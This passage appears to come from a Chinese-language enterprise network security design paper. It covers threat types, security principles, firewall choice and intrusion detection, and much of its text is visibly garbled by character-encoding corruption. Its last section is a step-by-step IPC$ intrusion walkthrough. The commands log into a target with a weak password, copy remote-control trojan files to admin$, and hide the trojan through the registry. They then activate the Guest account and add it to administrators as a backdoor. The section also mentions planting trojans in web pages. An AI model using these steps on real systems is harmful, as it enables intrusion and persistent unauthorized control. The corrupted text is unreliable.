62、變?yōu)楦呒?jí)用戶(hù)，一旦成功，黑客可以直接進(jìn)入口令檔。黑客還能開(kāi)發(fā)欺騙程序，將其裝入U(xiǎn)NIX服務(wù)器中，用以監(jiān)聽(tīng)登錄會(huì)話(huà)。當(dāng)它發(fā)現(xiàn)有用戶(hù)登錄時(shí)，便開(kāi)始存儲(chǔ)一個(gè)檔，這樣黑客就擁有了他人的賬戶(hù)和口令。這時(shí)為了防止黑客，需要設(shè)置公開(kāi)服務(wù)器，使得它不離開(kāi)自己的空間而進(jìn)入另外的目錄。另外，還應(yīng)設(shè)置組特權(quán)，不允許任何使用公開(kāi)服務(wù)器的人訪問(wèn)WWW頁(yè)面檔以外的東西。在這個(gè)企業(yè)的局域網(wǎng)內(nèi)我們可以綜合采用防火墻技術(shù)、Web頁(yè)面保護(hù)技術(shù)、入侵檢測(cè)技術(shù)、安全評(píng)估技術(shù)來(lái)

63、保護(hù)網(wǎng)絡(luò)內(nèi)的信息資源，防止黑客攻擊。</p><p>　　7、通用網(wǎng)關(guān)接口（CGI）漏洞 </p><p>　　有一類(lèi)風(fēng)險(xiǎn)涉及通用網(wǎng)關(guān)接口（CGI）腳本。許多頁(yè)面檔和指向其它頁(yè)面或站點(diǎn)的超連接。然而有些站點(diǎn)用到這些超連接所指站點(diǎn)尋找特定信息。搜索引擎是通過(guò)CGI腳本執(zhí)行的方式實(shí)現(xiàn)的。黑客可以修改這些CGI腳本以執(zhí)行他們的非法任務(wù)。通常，這些CGI腳本只能在這些所指WWW服務(wù)器中尋找，但如果

64、進(jìn)行一些修改，他們就可以在WWW服務(wù)器之外進(jìn)行尋找。要防止這類(lèi)問(wèn)題發(fā)生，應(yīng)將這些CGI腳本設(shè)置為較低級(jí)用戶(hù)特權(quán)。提高系統(tǒng)的抗破壞能力，提高服務(wù)器備份與恢復(fù)能力，提高站點(diǎn)內(nèi)容的防篡改與自動(dòng)修復(fù)能力。</p><p><b>　　8、惡意代碼 </b></p><p>　　惡意代碼不限于病毒，還包括蠕蟲(chóng)、特洛伊木馬、邏輯炸彈、和其它未經(jīng)同意的軟件。應(yīng)該加強(qiáng)對(duì)惡意代碼的檢測(cè)

65、。</p><p><b>　　9、病毒的攻擊 </b></p><p>　　計(jì)算機(jī)病毒一直是計(jì)算機(jī)安全的主要威脅。能在Internet上傳播的新型病毒，例如通過(guò)E-Mail傳播的病毒，增加了這種威脅的程度。病毒的種類(lèi)和傳染方式也在增加，國(guó)際空間的病毒總數(shù)已達(dá)上萬(wàn)甚至更多。當(dāng)然，查看文文件、瀏覽圖像或在Web上填表都不用擔(dān)心病毒感染，然而，下載可執(zhí)行檔和接收來(lái)歷不明的

66、E-Mail檔需要特別警惕，否則很容易使系統(tǒng)導(dǎo)致嚴(yán)重的破壞。典型的“CIH”病毒就是一可怕的例子。</p><p>　　10、網(wǎng)絡(luò)的攻擊手段 </p><p>　　一般認(rèn)為，目前對(duì)網(wǎng)絡(luò)的攻擊手段主要表現(xiàn)在：</p><p>　　非授權(quán)訪問(wèn)：沒(méi)有預(yù)先經(jīng)過(guò)同意，就使用網(wǎng)絡(luò)或計(jì)算機(jī)資源被看作非授權(quán)訪問(wèn)，如有意避開(kāi)系統(tǒng)訪問(wèn)控制機(jī)制，對(duì)網(wǎng)絡(luò)設(shè)備及資源進(jìn)行非正常使用，或擅自擴(kuò)大

67、權(quán)限，越權(quán)訪問(wèn)信息。它主要有以下幾種形式：假冒、身份攻擊、非法用戶(hù)進(jìn)入網(wǎng)絡(luò)系統(tǒng)進(jìn)行違法操作、合法用戶(hù)以未授權(quán)方式進(jìn)行操作等。</p><p>　　信息泄漏或丟失：指敏感數(shù)據(jù)在有意或無(wú)意中被泄漏出去或丟失，它通常包括，信息在傳輸中丟失或泄漏（如"黑客"們利用電磁泄漏或搭線(xiàn)竊聽(tīng)等方式可截獲機(jī)密信息，或通過(guò)對(duì)信息流向、流量、通信頻度和長(zhǎng)度等參數(shù)的分析，推出有用信息，如用戶(hù)口令、賬號(hào)等重要信息。），信

68、息在存儲(chǔ)介質(zhì)中丟失或泄漏，通過(guò)建立隱蔽隧道等竊取敏感信息等。</p><p>　　破壞數(shù)據(jù)完整性：以非法手段竊得對(duì)數(shù)據(jù)的使用權(quán)，刪除、修改、插入或重發(fā)某些重要信息，以取得有益于攻擊者的響應(yīng)；惡意添加，修改數(shù)據(jù)，以干擾用戶(hù)的正常使用。</p><p>　　拒絕服務(wù)攻擊：它不斷對(duì)網(wǎng)絡(luò)服務(wù)系統(tǒng)進(jìn)行干擾，改變其正常的作業(yè)流程，執(zhí)行無(wú)關(guān)程序使系統(tǒng)響應(yīng)減慢甚至癱瘓，影響正常用戶(hù)的使用，甚至使合法用戶(hù)被

69、排斥而不能進(jìn)入計(jì)算機(jī)網(wǎng)絡(luò)系統(tǒng)或不能得到相應(yīng)的服務(wù)。</p><p>　　利用網(wǎng)絡(luò)傳播病毒：通過(guò)網(wǎng)絡(luò)傳播計(jì)算機(jī)病毒，其破壞性大大高于單機(jī)系統(tǒng)，而且用戶(hù)很難防范。</p><p>　?。?）網(wǎng)絡(luò)安全的系統(tǒng)目標(biāo)</p><p>　　1、建立網(wǎng)絡(luò)防病毒系統(tǒng)</p><p>　　2、建立入侵檢測(cè)系統(tǒng)</p><p>　　3、建立

70、漏洞掃描系統(tǒng)</p><p>　　4、合理進(jìn)行VLAN劃分</p><p>　　5、IP地址與MAC地址的綁定</p><p><b>　　總體規(guī)劃</b></p><p>　?。ㄒ唬?安全體系結(jié)構(gòu) </p><p><b>　　1. 網(wǎng)絡(luò)結(jié)構(gòu)安全</b></p>

71、;<p>　　2. 加強(qiáng)訪問(wèn)控制 3. 安全檢測(cè) </p><p>　?。ǘ┌踩w系設(shè)計(jì) </p><p>　　1. 網(wǎng)絡(luò)結(jié)構(gòu)安全　　網(wǎng)絡(luò)結(jié)構(gòu)布局的合理與否，也影響著網(wǎng)絡(luò)的安全性。對(duì)銀行系統(tǒng)業(yè)務(wù)網(wǎng)、辦公網(wǎng)、與外單位互聯(lián)的接口網(wǎng)絡(luò)之間必須按各自的應(yīng)用范圍、安全保密程度進(jìn)行合理分布，以免局部安全性較低的網(wǎng)絡(luò)系統(tǒng)造成的威脅，傳播到整個(gè)網(wǎng)絡(luò)系統(tǒng)?！　?. 加強(qiáng)訪問(wèn)控

72、制　　1) 如果銀行系統(tǒng)有上Internet公網(wǎng)的需求，則從安全性考濾，銀行業(yè)務(wù)系統(tǒng)網(wǎng)絡(luò)必須與Internet公網(wǎng)物理隔離。解決方法可以是兩個(gè)網(wǎng)絡(luò)之間完全斷開(kāi)或者通過(guò)物理安全隔離卡來(lái)實(shí)現(xiàn)?！　?) 網(wǎng)結(jié)構(gòu)合理分布后，在內(nèi)部局網(wǎng)內(nèi)可以通過(guò)交換機(jī)劃分VLAN功能來(lái)實(shí)現(xiàn)不同部門(mén)、不同級(jí)別用戶(hù)之間簡(jiǎn)單的訪問(wèn)控制?！　?) 內(nèi)部局域網(wǎng)與外單位網(wǎng)絡(luò)、內(nèi)部局域網(wǎng)與不信任域網(wǎng)絡(luò)之間可以通過(guò)配備防火墻來(lái)實(shí)現(xiàn)內(nèi)、外網(wǎng)或不同信任域之間的隔離與訪問(wèn)控制。

73、　　4) 根據(jù)企業(yè)具體應(yīng)用，也可以配備應(yīng)用層的訪問(wèn)控制軟件系統(tǒng)，針對(duì)局域網(wǎng)具體的應(yīng)用進(jìn)行更細(xì)致的訪問(wèn)控制。　　5) 對(duì)于遠(yuǎn)程拔號(hào)訪問(wèn)用戶(hù)的安全性訪問(wèn)，可以利用防火墻的一次性口令認(rèn)證機(jī)制，對(duì)遠(yuǎn)程拔號(hào)用戶(hù)進(jìn)行身份認(rèn)證，實(shí)遠(yuǎn)程用戶(hù)的安全訪問(wèn)?！　?. 安全檢測(cè)　 　由于防火墻等安全控制系統(tǒng)都屬于靜態(tài)防護(hù)安</p><p>　?。ㄈ┚W(wǎng)絡(luò)安全體系原則</p><p>　　針對(duì)每一類(lèi)安全風(fēng)險(xiǎn)

74、，結(jié)合校園網(wǎng)的實(shí)際情況，將具體的分析網(wǎng)絡(luò)的安全風(fēng)險(xiǎn)。根據(jù)防范安全攻擊的安全需求、需要達(dá)到的安全目標(biāo)、對(duì)應(yīng)安全機(jī)制所需的安全服務(wù)等因素，參照SSE-CMM("系 統(tǒng)安全工程能力成熟模型")和ISO17799(信息安全管理標(biāo)準(zhǔn))等國(guó)際標(biāo)準(zhǔn)，綜合考慮可實(shí)施性、可管理性、可擴(kuò)展性、綜合完備性、系統(tǒng)均衡性等方面，網(wǎng)絡(luò)安全防范體系在整體設(shè)計(jì)過(guò)程中應(yīng)遵循以下9項(xiàng)原則： </p><p>　　1．網(wǎng)絡(luò)信息安全

75、的木桶原則 </p><p>　　網(wǎng)絡(luò)信息安全的木桶原則是指對(duì)信息均衡、全面的進(jìn)行保護(hù)?！澳就暗淖畲笕莘e取決于最短的一塊木板”。網(wǎng)絡(luò)信息系統(tǒng)是一個(gè)復(fù)雜的計(jì)算機(jī)系統(tǒng)，它本身在物理上、操作上和管理上的種種漏洞構(gòu)成了系統(tǒng)的安全脆弱性，尤其是多用戶(hù)網(wǎng)絡(luò)系統(tǒng)自身的復(fù)雜性、資源共享性使單純的技術(shù) 保護(hù)防不勝防。攻擊者使用的“最易滲透原則”，必然在系統(tǒng)中最薄弱的地方進(jìn)行攻擊。因此，充分、全面、完整地對(duì)系統(tǒng)的安全漏洞和安全威脅進(jìn)

76、行分析，評(píng)估和 檢測(cè)（包括模擬攻擊）是設(shè)計(jì)信息安全系統(tǒng)的必要前提條件。安全機(jī)制和安全服務(wù)設(shè)計(jì)的首要目的是防止最常用的攻擊手段，根本目的是提高整個(gè)系統(tǒng)的"安全最低點(diǎn)"的安全性能。 </p><p>　　2．網(wǎng)絡(luò)信息安全的整體性原則 </p><p>　　要求在網(wǎng)絡(luò)發(fā)生被攻擊、破壞事件的情況下，必須盡可能地快速恢復(fù)網(wǎng)絡(luò)信息中心的服務(wù)，減少損失。因此，信息安全系統(tǒng)應(yīng)該包括安全

77、防護(hù)機(jī)制、安全檢測(cè)機(jī)制和安全恢復(fù)機(jī)制。安全防護(hù)機(jī)制是根據(jù)具體系統(tǒng)存在的各種安全威脅采取的相應(yīng)的防護(hù)措施，避免非法攻擊的進(jìn)行。安全檢 測(cè)機(jī)制是檢測(cè)系統(tǒng)的運(yùn)行情況，及時(shí)發(fā)現(xiàn)和制止對(duì)系統(tǒng)進(jìn)行的各種攻擊。安全恢復(fù)機(jī)制是在安全防護(hù)機(jī)制失效的情況下，進(jìn)行應(yīng)急處理和盡量、及時(shí)地恢復(fù)信息，減少供給的破壞程度。 </p><p>　　3．安全性評(píng)價(jià)與平衡原則 </p><p>　　對(duì)任何網(wǎng)絡(luò)，絕對(duì)安全難以達(dá)

78、到，也不一定是必要的，所以需要建立合理的實(shí)用安全性與用戶(hù)需求評(píng)價(jià)與平衡體系。安全 體系設(shè)計(jì)要正確處理需求、風(fēng)險(xiǎn)與代價(jià)的關(guān)系，做到安全性與可用性相容，做到組織上可執(zhí)行。評(píng)價(jià)信息是否安全，沒(méi)有絕對(duì)的評(píng)判標(biāo)準(zhǔn)和衡量指標(biāo)，只能決定于系統(tǒng)的用戶(hù)需求和具體的應(yīng)用環(huán)境，具體取決于系統(tǒng)的規(guī)模和范圍，系統(tǒng)的性質(zhì)和信息的重要程度。 </p><p>　　4．標(biāo)準(zhǔn)化與一致性原則 </p><p>　　系統(tǒng)是一個(gè)

79、龐大的系統(tǒng)工程，其安全體系的設(shè)計(jì)必須遵循一系列的標(biāo)準(zhǔn)，這樣才能確保各個(gè)分系統(tǒng)的一致性，使整個(gè)系統(tǒng)安全地互聯(lián)互通、信息共享。 </p><p>　　5．技術(shù)與管理相結(jié)合原則 </p><p>　　安全體系是一個(gè)復(fù)雜的系統(tǒng)工程，涉及人、技術(shù)、操作等要素，單靠技術(shù)或單靠管理都不可能實(shí)現(xiàn)。因此，必須將各種安全技術(shù)與運(yùn)行管理機(jī)制、人員思想教育與技術(shù)培訓(xùn)、安全規(guī)章制度建設(shè)相結(jié)合。 </p>

80、<p>　　6．統(tǒng)籌規(guī)劃，分步實(shí)施原則 </p><p>　　由于政策規(guī)定、服務(wù)需求的不明朗，環(huán)境、條件、時(shí)間的變化，攻擊手段的進(jìn)步，安全防護(hù)不可能一步到位，可在一個(gè)比 較全面的安全規(guī)劃下，根據(jù)網(wǎng)絡(luò)的實(shí)際需要，先建立基本的安全體系，保證基本的、必須的安全性。隨著今后隨著網(wǎng)絡(luò)規(guī)模的擴(kuò)大及應(yīng)用的增加，網(wǎng)絡(luò)應(yīng)用和復(fù)雜程 度的變化，網(wǎng)絡(luò)脆弱性也會(huì)不斷增加，調(diào)整或增強(qiáng)安全防護(hù)力度，保證整個(gè)網(wǎng)絡(luò)最根本的安全需求

81、。 </p><p><b>　　7．等級(jí)性原則 </b></p><p>　　等級(jí)性原則是指安全層次和安全級(jí)別。良好的信息安全系統(tǒng)必然是分為不同等級(jí)的，包括對(duì)信息保密程度分級(jí)，對(duì)用戶(hù)操 作權(quán)限分級(jí)，對(duì)網(wǎng)絡(luò)安全程度分級(jí)（安全子網(wǎng)和安全區(qū)域），對(duì)系統(tǒng)實(shí)現(xiàn)結(jié)構(gòu)的分級(jí)（應(yīng)用層、網(wǎng)絡(luò)層、鏈路層等），從而針對(duì)不同級(jí)別的安全對(duì)象，提供全面、可 選的安全算法和安全體制，以滿(mǎn)足網(wǎng)絡(luò)中

82、不同層次的各種實(shí)際需求。 </p><p><b>　　8．動(dòng)態(tài)發(fā)展原則 </b></p><p>　　要根據(jù)網(wǎng)絡(luò)安全的變化不斷調(diào)整安全措施，適應(yīng)新的網(wǎng)絡(luò)環(huán)境，滿(mǎn)足新的網(wǎng)絡(luò)安全需求。 </p><p><b>　　9．易操作性原則 </b></p><p>　　首先，安全措施需要人為去完成，如果措施

83、過(guò)于復(fù)雜，對(duì)人的要求過(guò)高，本身就降低了安全性。其次，措施的采用不能影響系統(tǒng)的正常運(yùn)行。 </p><p>　　由于互聯(lián)網(wǎng)絡(luò)的開(kāi)放性和通信協(xié)議的安全缺陷，以及在網(wǎng)絡(luò)環(huán)境中數(shù)據(jù)信息存儲(chǔ)和對(duì)其訪問(wèn)與處理的分布性特點(diǎn)，網(wǎng)上傳 輸?shù)臄?shù)據(jù)信息很容易泄露和被破壞，網(wǎng)絡(luò)受到的安全攻擊非常嚴(yán)重，因此建立有效的網(wǎng)絡(luò)安全防范體系就更為迫切。實(shí)際上，保障網(wǎng)絡(luò)安全不但需要參考網(wǎng)絡(luò)安全的 各項(xiàng)標(biāo)準(zhǔn)以形成合理的評(píng)估準(zhǔn)則，更重要的是必須明確網(wǎng)絡(luò)

84、安全的框架體系、安全防范的層次結(jié)構(gòu)和系統(tǒng)設(shè)計(jì)的基本原則，分析網(wǎng)絡(luò)系統(tǒng)的各個(gè)不安全環(huán)節(jié)，找到安 全漏洞，做到有的放矢。 </p><p>　?。ㄋ模┌踩a(chǎn)品選型原則</p><p>　　從總體的設(shè)計(jì)安全產(chǎn)品中，沒(méi)有一種產(chǎn)品是適用于所有的環(huán)境的，因此，在選擇防火墻時(shí)，應(yīng)根據(jù)網(wǎng)絡(luò)和站點(diǎn)的特點(diǎn)來(lái)選擇。</p><p>　　1. 如果站點(diǎn)對(duì)保密性要求高，應(yīng)選擇有強(qiáng)大認(rèn)證功能的

85、防火墻，如代理服務(wù)器或混合性防火墻；</p><p>　　2. 如需要較高的網(wǎng)絡(luò)通信效率，網(wǎng)絡(luò)接入寬帶較高，又只需保障基本的安全性能，則包過(guò)濾式較好的選擇；</p><p>　　3. 如果站點(diǎn)連接到英特網(wǎng)上僅是為了接受電子郵件，則根本不需要防火墻</p><p>　　在決定用防火墻來(lái)實(shí)施網(wǎng)絡(luò)的安全策略后，不管具體的實(shí)施原理是什么，良好的防火墻一般應(yīng)具備以下功能：&l

86、t;/p><p>　?。?）. 本身支持安全策略</p><p>　　（2）. 當(dāng)網(wǎng)絡(luò)的安全策略改變時(shí)，可加入新服務(wù)</p><p>　　（3）. 必要時(shí)能運(yùn)用過(guò)濾技術(shù)來(lái)允許和禁止服務(wù)</p><p>　?。?）. 有先進(jìn)的認(rèn)證手段，或可以安裝先進(jìn)的認(rèn)證方法</p><p>　?。?）. 能支持除非明確允許，否則就禁止先進(jìn)

87、的認(rèn)證方法</p><p>　　（6）. 可使用FTP和Telnet（遠(yuǎn)程登錄）等服務(wù)代理</p><p>　?。?）. 能根據(jù)數(shù)據(jù)包的性質(zhì)進(jìn)行包過(guò)濾</p><p>　　（8）. 允許公眾對(duì)站點(diǎn)的訪問(wèn)</p><p>　?。?）. 能把信息服務(wù)器和其它內(nèi)部服務(wù)器分開(kāi)</p><p><b>　　安全方案設(shè)計(jì)

88、</b></p><p>　　通過(guò)對(duì)網(wǎng)絡(luò)的全面了解，按照安全策略的要求、風(fēng)險(xiǎn)分析的結(jié)果及整個(gè)網(wǎng)絡(luò)的安全目標(biāo)，整個(gè)網(wǎng)絡(luò)措施應(yīng)按系統(tǒng)體系建立。具體由系統(tǒng)實(shí)施以下幾個(gè)方面構(gòu)成：入侵檢測(cè)技術(shù)，防火墻安全技術(shù)，交換機(jī)端口隔離技術(shù)和路由器技術(shù)。</p><p>　　(一)利用入侵檢測(cè)技術(shù)實(shí)施安全防護(hù)</p><p>　　James Aderson在1980年使用了“

89、威脅”概述術(shù)語(yǔ)，其定義與入侵含義相同。將入侵企圖或威脅定義未經(jīng)授權(quán)蓄意嘗試訪問(wèn)信息、竄改信息、使系統(tǒng)不可靠或不能使用。Heady給出定外的入侵定義，入侵時(shí)指任何企圖破壞資源的完整性、機(jī)密性及可用性的活動(dòng)集合。Smaha從分類(lèi)角度指出入侵包括嘗試性闖入、偽裝攻擊、安全控制系統(tǒng)滲透、泄漏、拒絕服務(wù)、惡意使用六種類(lèi)型。</p><p>　　從技術(shù)上入侵檢測(cè)系統(tǒng)可分為異常檢測(cè)型和誤用檢測(cè)型兩大類(lèi)。異常入侵檢測(cè)是指能夠根據(jù)

90、異常行為和使用計(jì)算機(jī)資源情況檢測(cè)出來(lái)的入侵。異常檢測(cè)試圖用定量方式描述可接受的行為特征，以區(qū)別非正常的、潛在入侵性行為。誤用入侵檢測(cè)是指利用已知系統(tǒng)和應(yīng)用軟件的弱點(diǎn)攻擊模式來(lái)檢測(cè)入侵。與異常入侵檢測(cè)相反，誤用入侵檢測(cè)能直接檢測(cè)不利的或不可接受的行為，而異常入侵檢測(cè)是檢查同正常行為相違背的行為。從系統(tǒng)結(jié)構(gòu)上分，入侵檢測(cè)系統(tǒng)大致可以分為基于主機(jī)型、基于網(wǎng)絡(luò)型和基于主體型三種。</p><p>　　基于主機(jī)入侵檢測(cè)系統(tǒng)

91、為早期的入侵檢測(cè)系統(tǒng)結(jié)構(gòu)、其檢測(cè)的目標(biāo)主要是主機(jī)系統(tǒng)和系統(tǒng)本地用戶(hù)。檢測(cè)原理是根據(jù)主機(jī)的審計(jì)數(shù)據(jù)和系統(tǒng)的日志發(fā)現(xiàn)可疑事件，檢測(cè)系統(tǒng)可以運(yùn)行在被檢測(cè)的主機(jī)上。這種類(lèi)型系統(tǒng)依賴(lài)于審計(jì)數(shù)據(jù)或系統(tǒng)日志準(zhǔn)確性和完整性以及安全事件的定義。若入侵者設(shè)法逃避設(shè)計(jì)或進(jìn)行合作入侵，則基于主機(jī)檢測(cè)系統(tǒng)就暴露出其弱點(diǎn)，特別是在現(xiàn)在的網(wǎng)絡(luò)環(huán)境下。單獨(dú)地依靠主機(jī)設(shè)計(jì)信息進(jìn)行入侵檢測(cè)難以適應(yīng)網(wǎng)絡(luò)安全的需求。這主要表現(xiàn)，一是主機(jī)的審計(jì)信息弱點(diǎn)，如易受攻擊，入侵者可通過(guò)

92、通過(guò)使用某些系統(tǒng)特權(quán)或調(diào)用比審計(jì)本身更低級(jí)的操作來(lái)逃避審計(jì)。二是不能通過(guò)分析主機(jī)審計(jì)記錄來(lái)檢測(cè)網(wǎng)絡(luò)攻擊（域名欺騙、端口掃描等）。因此，基于網(wǎng)絡(luò)入侵檢測(cè)系統(tǒng)對(duì)網(wǎng)絡(luò)安全是必要的，這種檢測(cè)系統(tǒng)根據(jù)網(wǎng)絡(luò)流量、協(xié)議分析、簡(jiǎn)單網(wǎng)絡(luò)管理協(xié)議信息等數(shù)據(jù)檢測(cè)入侵。主機(jī)和網(wǎng)絡(luò)型的入侵檢測(cè)系統(tǒng)是一個(gè)統(tǒng)一集中系統(tǒng)，但是，隨著網(wǎng)絡(luò)系統(tǒng)結(jié)構(gòu)復(fù)雜化和大型化，系統(tǒng)的弱點(diǎn)或漏洞將趨向于分布式。另外，入侵行為不再是單一的行為，而是表現(xiàn)出相互協(xié)作入侵特點(diǎn)。入侵檢測(cè)系統(tǒng)要求可

93、適應(yīng)性、可訓(xùn)練性、高效性、容錯(cuò)性、可擴(kuò)展性等要求。不同的IDS之間也需要共享信息，協(xié)作檢測(cè)。于是，美</p><p>　　對(duì)于入侵檢測(cè)系統(tǒng)評(píng)估，主要性能指針有：</p><p>　　a.可靠性，系統(tǒng)具有容錯(cuò)能力和可連續(xù)運(yùn)行；</p><p>　　b.可用性，系統(tǒng)開(kāi)銷(xiāo)要最小，不會(huì)嚴(yán)重降低網(wǎng)絡(luò)系統(tǒng)性能；</p><p>　　c.可測(cè)試，通過(guò)攻擊可

94、以檢測(cè)系統(tǒng)運(yùn)行；</p><p>　　d.適應(yīng)性，對(duì)系統(tǒng)來(lái)說(shuō)必須是易于開(kāi)發(fā)和添加新的功能，能隨時(shí)適應(yīng)系統(tǒng)環(huán)境的改變；e.實(shí)時(shí)性，系統(tǒng)能盡快地察覺(jué)入侵企圖以便制止和限制破壞； </p><p>　　f.準(zhǔn)確性，檢測(cè)系統(tǒng)具有低的誤警率和漏警率；</p><p>　　g.安全性，檢測(cè)系統(tǒng)必須難于被欺騙和能夠保護(hù)自身安全。</p><p>　　1、建

95、立ipc$連接在hack攻擊中的作用</p><p>　　利用IPC$,連接者甚至可以與目標(biāo)主機(jī)建立一個(gè)空的連接而無(wú)需用戶(hù)名與密碼(當(dāng)然,對(duì)方機(jī)器必須開(kāi)了ipc$共享,否則你是連接不上的)，而利用這個(gè)空的連接，連接者還可以得到目標(biāo)主機(jī)上的用戶(hù)列表(不過(guò)負(fù)責(zé)的管理員會(huì)禁止導(dǎo)出用戶(hù)列表的)。</p><p>　　就像上面所說(shuō)的,即使建立了一個(gè)空的連接,也可以獲得不少的信息(而這些信息往往是入侵

96、中必不可少的),訪問(wèn)部分共享,如果能夠以某一個(gè)具有一定權(quán)限的用戶(hù)身份登陸的話(huà),那么就會(huì)得到相應(yīng)的權(quán)限?；旧峡梢钥偨Y(jié)為獲取目標(biāo)信息、管理目標(biāo)進(jìn)程和服務(wù),上傳木馬并運(yùn)行,如果是2000server，還可以考慮開(kāi)啟終端服務(wù)方便控制.雖然會(huì)有一些傻傻的管理員用空口令或者弱智密碼,但這畢竟是少數(shù),而且現(xiàn)在不比從前了,隨著人們安全意識(shí)的提高,管理員們也愈加小心了,得到管理員密碼會(huì)越來(lái)越難的。</p><p>　　因此今后最

97、大的可能就是以極小的權(quán)限甚至是沒(méi)有權(quán)限進(jìn)行連接,就會(huì)慢慢的發(fā)現(xiàn)ipc$連接并不是萬(wàn)能的,甚至在主機(jī)不開(kāi)啟ipc$共享時(shí),就無(wú)法連接。</p><p>　　所以不要把ipc$入侵當(dāng)作終極武器,不要認(rèn)為它戰(zhàn)無(wú)不勝,它就像是足球場(chǎng)上射門(mén)前的傳球,很少會(huì)有致命一擊的效果,但卻是不可缺少的,這才是ipc$連接在hack入侵中的意義所在。</p><p>　　2、 ipc$與空連接,139,445端口

98、,默認(rèn)共享的關(guān)系 </p><p>　　(1) ipc$與空連接: </p><p>　　不需要用戶(hù)名與密碼的ipc$連接即為空連接,一旦你以某個(gè)用戶(hù)或管理員的身份登陸(即以特定的用戶(hù)名和密碼進(jìn)行ipc$連接),自然就不能叫做空連接了。 </p><p>　　(2) ipc$與139,445端口: </p><p>　　ipc$連接可以實(shí)現(xiàn)遠(yuǎn)

99、程登陸及對(duì)默認(rèn)共享的訪問(wèn);而139端口的開(kāi)啟表示netbios協(xié)議的應(yīng)用,可以通過(guò)139,445(win2000)端口實(shí)現(xiàn)對(duì)共享文件/打印機(jī)的訪問(wèn),因此一般來(lái)講,ipc$連接是需要139或445端口來(lái)支持的。 </p><p>　　(3) ipc$與默認(rèn)共享 </p><p>　　默認(rèn)共享是為了方便管理員遠(yuǎn)程管理而默認(rèn)開(kāi)啟的共享,即所有的邏輯盤(pán)(c$,d$,e$......)和系統(tǒng)目錄wi

100、nnt或windows(admin$),通過(guò)ipc$連接可以實(shí)現(xiàn)對(duì)這些默認(rèn)共享的訪問(wèn)(前提是對(duì)方?jīng)]有關(guān)閉這些默認(rèn)共享)</p><p>　　3、如何打開(kāi)目標(biāo)的IPC$</p><p>　　首先需要獲得一個(gè)不依賴(lài)于ipc$的shell，比如sql的cmd擴(kuò)展、telnet、木馬,當(dāng)然，這shell必須是admin權(quán)限的,然后可以使用shell執(zhí)行命令 net share ipc$ 來(lái)開(kāi)放目標(biāo)

101、的ipc$。從上面可以知道，ipc$能否使用還有很多條件。請(qǐng)確認(rèn)相關(guān)服務(wù)都已運(yùn)行，沒(méi)有就啟動(dòng)它（具體做法在net命令里很詳細(xì)）,還是不行的話(huà)（比如有防火墻，殺不了）無(wú)法用ipc$完成入侵。</p><p><b>　　4、入侵模式 </b></p><p><b>　　1 net use</b></p><p><b

102、>　　先用空連接試，</b></p><p>　　2 再用掃描軟件查看它的端口看后139和445端口都已經(jīng)打開(kāi)</p><p>　　3 再掃描用戶(hù)名以及密碼(弱口令)</p><p>　　看到用戶(hù)名和密碼(太簡(jiǎn)單)</p><p>　　4 C:>net use \192.168.0.3IPC$ "123&qu

103、ot; /user:"admintitrators" </p><p>　　這是用《流光》掃到的用戶(hù)名是administrators，密碼為"123"的IP地址，如果是打算攻擊的話(huà)，就可以用這樣的命令來(lái)與192.168.0.3建立一個(gè)連接，因?yàn)槊艽a為"123"，，后面一個(gè)雙引號(hào)里的是用戶(hù)名，輸入administrators，命令即可成功完成。 </

104、p><p>　　5 C:> copy aaa.reg \\192.168.0.3\admin$\speech</p><p>　　copy admdll.dll \\192.168.0.3\admin$\speech</p><p>　　copy raddrv.dll \\192.168.0.3\admin$\speech</p><p>

105、　　copy r_server.exe \\192.168.0.3\admin$\speech </p><p>　　先復(fù)r_server.exe,以及admdll.dll, raddrv.dll.和注冊(cè)表aaa.reg到目標(biāo)機(jī)windows\admin\speech的活頁(yè)夾下。</p><p>　　6 C:>net time \192.168.0.3 </p><

106、;p>　　查查時(shí)間，發(fā)現(xiàn)192.168.0.3 的當(dāng)前時(shí)間是 2008/12/19 上午 11:00，命令成功完成。</p><p>　　7 運(yùn)行psexe進(jìn)到目標(biāo)機(jī)的dos下</p><p>　　8查看目標(biāo)機(jī)的ip地址</p><p>　　9進(jìn)入到傳了木馬的文檔夾下</p><p>　　10啟動(dòng)r-server</p>

107、<p>　　11為了以后的方便，打通一個(gè)1234斷口并且設(shè)密碼為1234</p><p>　　12將注冊(cè)表導(dǎo)入，是為了隱藏木馬不在任務(wù)欄顯示</p><p><b>　　13啟動(dòng)服務(wù)</b></p><p>　　14用admin連接看是成功的 </p><p>　　為了以防萬(wàn)一,我們?cè)侔裧uest啟動(dòng)加到管理組

108、 </p><p>　　15 C:>net user guest /active:yes 命令將對(duì)方的Guest用戶(hù)啟動(dòng)</p><p>　　16 C:>net user guest 1234 命令將Guest的密碼改為1234</p><p>　　17 C:>net localgroup administrators guest /add <

109、;/p><p>　　將Guest變?yōu)锳dministrator(如果管理員密碼更改，guest賬號(hào)沒(méi)改變的話(huà)，下次我們可以用guest再次訪問(wèn)這臺(tái)計(jì)算機(jī))</p><p>　　但是看到了ipc$入侵有很大的局限性，所以通過(guò)internet入侵，可以隱藏木馬比如：把木馬加到網(wǎng)頁(yè)上，為了再隱藏它就把掛木馬的網(wǎng)頁(yè)加到視頻里。只要看視頻（前提是連網(wǎng)）網(wǎng)頁(yè)就會(huì)自動(dòng)彈出。也就是打開(kāi)了網(wǎng)頁(yè)，機(jī)子就中木馬，可